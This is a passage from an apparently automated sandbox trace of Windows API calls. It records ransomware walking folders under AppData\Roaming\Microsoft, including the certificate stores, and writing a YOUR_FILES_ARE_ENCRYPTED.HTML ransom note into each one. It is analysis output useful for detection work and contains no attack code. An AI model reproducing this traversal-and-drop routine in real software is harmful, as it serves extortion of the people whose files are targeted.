lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.407] PathFindExtensionW (pszPath="Preferred") returned="" [0165.407] lstrlenW (lpString="") returned 0 [0165.407] PathFindExtensionW (pszPath="Preferred") returned="" [0165.407] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x7bbd79d0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x7bbd79d0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0xaf2c83e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0165.407] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.407] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0165.407] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3683305739-1236715609-858405165-1000\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3683305739-1236715609-858405165-1000\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.408] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.410] CloseHandle (hObject=0x5b8) returned 1 [0165.410] GetProcessHeap () returned 0x270000 [0165.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.411] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="S-1-5-21-892523515-1518344882-2423736544-500", cAlternateFileName="S-1-5-~1")) returned 1 [0165.411] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned 102 [0165.411] GetProcessHeap () returned 0x270000 [0165.411] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0165.411] lstrcpyW (in: lpString1=0x73e0048, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500" [0165.411] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*" [0165.411] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.416] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.416] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8276c76d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0x0, dwReserved1=0x60, cFileName="16d9487c-eb21-48f6-b767-53160cf7974d", cAlternateFileName="16D948~1")) returned 1 [0165.416] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\16d9487c-eb21-48f6-b767-53160cf7974d") returned 139 [0165.416] lstrcmpW (lpString1="16d9487c-eb21-48f6-b767-53160cf7974d", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.416] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0165.417] lstrlenW (lpString="") returned 0 [0165.418] PathFindExtensionW (pszPath="16d9487c-eb21-48f6-b767-53160cf7974d") returned="" [0165.418] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0165.418] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\Preferred") returned 112 [0165.418] lstrcmpW (lpString1="Preferred", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.418] 
PathFindExtensionW (pszPath="Preferred") returned="" [0165.431] lstrlenW (lpString="") returned 0 [0165.437] PathFindExtensionW (pszPath="Preferred") returned="" [0165.437] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd2474dd0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2474dd0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82850fae, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x60, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0165.437] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0165.438] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0165.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-892523515-1518344882-2423736544-500\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-892523515-1518344882-2423736544-500\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0165.440] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0165.442] CloseHandle (hObject=0x5b8) returned 1 [0165.443] GetProcessHeap () returned 0x270000 [0165.444] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0165.448] FindNextFileW (in: 
hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd3f3c550, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd3f3c550, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf8d95f90, ftLastWriteTime.dwHighDateTime=0x1d7a942, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x60, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0165.448] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\SYNCHIST") returned 66 [0165.448] lstrcmpW (lpString1="SYNCHIST", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.448] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0165.448] lstrlenW (lpString="") returned 0 [0165.448] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0165.448] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd3f3c550, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd3f3c550, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf8d95f90, ftLastWriteTime.dwHighDateTime=0x1d7a942, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x60, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0165.448] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0165.448] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0165.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Protect\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\protect\\your_files_are_encrypted.html"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0165.449] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0165.451] CloseHandle (hObject=0x5e4) returned 1 [0165.451] GetProcessHeap () returned 0x270000 [0165.453] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76a0010 | out: hHeap=0x270000) returned 1 [0165.453] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96478d, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0165.453] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned 68 [0165.453] GetProcessHeap () returned 0x270000 [0165.453] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x76a0010 [0165.453] lstrcpyW (in: lpString1=0x76a0010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0165.454] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0165.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0165.454] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.454] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="My", cAlternateFileName="")) returned 1 [0165.454] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned 71 [0165.454] 
GetProcessHeap () returned 0x270000 [0165.454] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0165.456] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0165.456] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0165.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0165.457] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9575e2bd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.457] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0165.457] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned 84 [0165.457] GetProcessHeap () returned 0x270000 [0165.457] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.458] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0165.458] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0165.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, 
ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.458] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.458] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.458] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.458] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0165.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0165.459] WriteFile (in: 
hFile=0x304, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0165.461] CloseHandle (hObject=0x304) returned 1 [0165.461] GetProcessHeap () returned 0x270000 [0165.462] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0165.462] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="CRLs", cAlternateFileName="")) returned 1 [0165.462] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned 76 [0165.462] GetProcessHeap () returned 0x270000 [0165.462] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0165.462] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0165.462] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0165.462] FindFirstFileW 
(in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0165.463] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0165.463] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x9573815c, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0165.463] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0165.463] wnsprintfW (in: 